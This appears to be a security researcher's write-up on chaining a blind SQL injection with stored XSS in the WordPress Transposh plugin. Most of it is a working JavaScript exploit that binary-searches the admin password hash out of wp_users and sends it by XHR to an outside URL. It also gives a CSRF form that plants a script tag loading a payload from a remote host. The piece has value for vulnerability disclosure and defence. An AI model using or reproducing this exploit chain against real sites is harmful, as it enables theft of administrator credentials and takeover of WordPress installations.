How to Reduce the Exploitation Requests from ~2200 to ~300

So we need to find a way not to have to send 76 requests per character - from 46 (.) to 122 (lower-capital z). So let’s do it by approximation. My idea is to use the range of 46-122 and apply some math:

Let’s first define a couple of things:

  • 46: the lowest end of the possible character set –> cur (current) value.
  • 122: the upper end of the possible character set –> max (maximum) value.
  • 0: the previous valid current value –> prev value. Here we need to keep track of the previously true case value to be able to revert the calculation to a working case if we’d encounter a false case. 0 because we don’t know the first valid value.

Doing the initial between check of cur and maxwill always result in a true case (because it’s the entire allowed character set). To narrow it down, we now point cur value to exactly the middle between cur and max using the formula:

cur = cur + (Math.floor((max-cur)/2));

This results in a check of BETWEEN 84 and 122. So we’re checking if the target is located in the upper OR implicitly in the lower half of the range. If this would again result in a true case because the character in probing is in that range, do the same calculation again and narrow it down to the correct character.

However, if we’d encounter a false case because the character is lower than 84, then let’s set the max value to the cur one because we have to instead look into the lower half, and also set cur to the prev value to keep track of it.

Based on this theory and to match the character uppercase C (ASCII: 67), the following would happen:

true: cur:84, prev:46,max:122
true: cur:65, prev:46,max:84
true: cur:74, prev:65,max:84
true: cur:69, prev:65,max:74
true: cur:67, prev:65,max:69
true: cur:68, prev:67,max:69
true: cur:67, prev:67,max:68

Finally, if cur equals prev, we’ve found the correct char. And it took about seven requests to get there, instead of 21 (67-46).

Some JavaScript (Magic)

Honestly, I’m not a JavaScript pro, and there might be ways to optimize it, but here’s my implementation of it, which should work with any blind SQL Injections that you want to chain with an XSS against WordPress:

async function exploit() {
    let result = "$P$B";
    let targetChar = 5;
    let prev = 0;
    let cur = 46;
    let max = 122;
    let requestCount = 0;

    do {
        let url = `/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),${targetChar},1))+BETWEEN+${cur}+AND+${max})+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))`

        const response = await fetch(url)
        const data = await response.text()

        requestCount = requestCount + 1;

        // this is the true/false differentiator
        if(data.includes("Bulk actions"))
        {
            // "true" case
            prev = cur;
            cur = cur + (Math.floor((max-cur)/2));

            //console.log('true: cur:' + cur + ', prev:' + prev + ',max:' + max );

            if(cur === 0 && prev === 0) {
                console.log('Request count: ' + requestCount);
                return(result)
            }

            // this means we've found the correct char
            if(cur === prev) {
                result = result + String.fromCharCode(cur);

                // reset initial values
                prev = 0;
                cur = 20;
                max = 122;

                // proceed with next char
                targetChar = targetChar + 1;

                console.log(result);
            }
        }
        else
        {
            // "false" case
            // console.log('false: cur:' + cur + ', prev:' + prev + ',max:' + max );

            max = cur;
            cur = prev;
        }
    } while (1)
}



exploit().then(x => {
    console.log('password: ' + x);

    // let's leak it to somewhere else
    leakUrl = "http://www.rcesecurity.com?password=" + x
    xhr = new XMLHttpRequest();
    xhr.open('GET', leakUrl);
    xhr.send();
});

Connecting the Dots

Now you could inject a Stored XSS payload like the following, which points a script src to a JavaScript file containing the payload:

<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="xss" />
      <input type="hidden" name="items" value="3" />
      <input type="hidden" name="tk0" value="xss&lt;script&#32;src&#61;&quot;https&#58;&#47;&#47;www&#46;attacker&#46;wf&#47;ff&#46;js&quot;&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Trick an admin into visiting the Transposh backend, and finally enjoy your WordPress hash:

❌
❌